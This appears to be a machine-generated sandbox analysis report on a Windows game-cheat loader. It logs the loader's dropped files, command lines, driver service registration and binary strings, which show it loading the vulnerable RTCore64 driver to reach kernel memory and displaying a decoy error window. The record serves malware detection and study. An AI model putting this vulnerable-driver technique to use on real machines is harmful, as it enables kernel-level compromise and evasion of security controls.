Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC416810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree,4_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4145E0: LoadLibraryA,LoadLibraryA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,SymFromName,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_time64,GetCurrentThreadId,srand,rand,rand,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,memset,?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z,??7ios_base@std@@QEBA_NXZ,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_wremove,CreateFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,SymUnloadModule64,SymCleanup,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7CC4145E0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC422900 RegCreateKeyW,RegSetKeyValueW,RegCloseKey,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,RegSetKeyValueW,RegCloseKey,RegCloseKey,GetModuleHandleA,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,RtlInitUnicodeString,NtLoadDriver,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7CC422900
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\Vulnerability.exeJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Windows\driverfo.sysJump to behavior
Source: C:\Windows\Vulnerability.exeFile created: C:\Windows\symbols\Jump to behavior
Source: C:\Windows\Vulnerability.exeFile created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbJump to behavior
Source: C:\Windows\Vulnerability.exeFile created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5Jump to behavior
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4145E04_2_00007FF7CC4145E0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4216304_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4113304_2_00007FF7CC411330
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC413CE04_2_00007FF7CC413CE0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4172B04_2_00007FF7CC4172B0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC417EA04_2_00007FF7CC417EA0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4232C04_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC423B604_2_00007FF7CC423B60
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC41FBF04_2_00007FF7CC41FBF0
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4168104_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4150104_2_00007FF7CC415010
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4164404_2_00007FF7CC416440
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe 4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys 27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nULoYBmSWb 01AA278B07B58DC46C84BD0B1B5C8E9EE4E62EA0BF7A695862444AF32E87F1FD
Source: C:\Windows\Vulnerability.exeProcess token adjusted: Load DriverJump to behavior
Source: C:\Windows\Vulnerability.exeCode function: String function: 00007FF7CC41A3C0 appears 102 times
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\Vulnerability.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\nULoYBmSWbJump to behavior
Source: nULoYBmSWb.4.drBinary string: \Device\PhysicalMemory
Source: driverfo.sys.0.drBinary string: \Device\{83040329-923773830}
Source: nULoYBmSWb.4.drBinary string: 0\DosDevices\RTCore64\Device\RTCore64
Source: classification engineClassification label: mal100.expl.evad.winEXE@27/9@1/3
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exeJump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\Windows\Vulnerability.exeFile created: C:\Users\user\AppData\Local\Temp\nULoYBmSWbJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: lUAc7lqa56.exeReversingLabs: Detection: 37%
Source: lUAc7lqa56.exeVirustotal: Detection: 29%
Source: unknownProcess created: C:\Users\user\Desktop\lUAc7lqa56.exe "C:\Users\user\Desktop\lUAc7lqa56.exe"
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\Vulnerability.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sysJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\Vulnerability.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: lUAc7lqa56.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: lUAc7lqa56.exeStatic file information: File size 6062592 > 1048576
Source: lUAc7lqa56.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c7a00
Source: lUAc7lqa56.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
